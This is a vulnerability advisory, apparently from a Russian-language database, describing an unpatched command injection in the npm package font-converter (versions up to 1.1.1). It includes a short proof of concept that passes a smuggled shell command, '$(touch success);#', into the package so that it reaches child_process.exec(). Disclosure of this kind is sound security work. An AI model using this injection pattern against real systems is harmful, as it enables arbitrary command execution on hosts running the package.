Описание
Font-Converter Vulnerable to Arbitrary Command Injection
Overview
font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF)
All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function.
PoC
var PUT = require('font-converter');
var x = "$(touch success);# ";
try {
new PUT(x, x, x, x);
} catch (e) {
console.log(e);
}
Пакеты
Наименование
font-converter
npm
Затронутые версииВерсия исправления
<= 1.1.1
Отсутствует
Связанные уязвимости
CVSS3: 9.8
nvd
больше 3 лет назад
All versions of package font-converter are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function.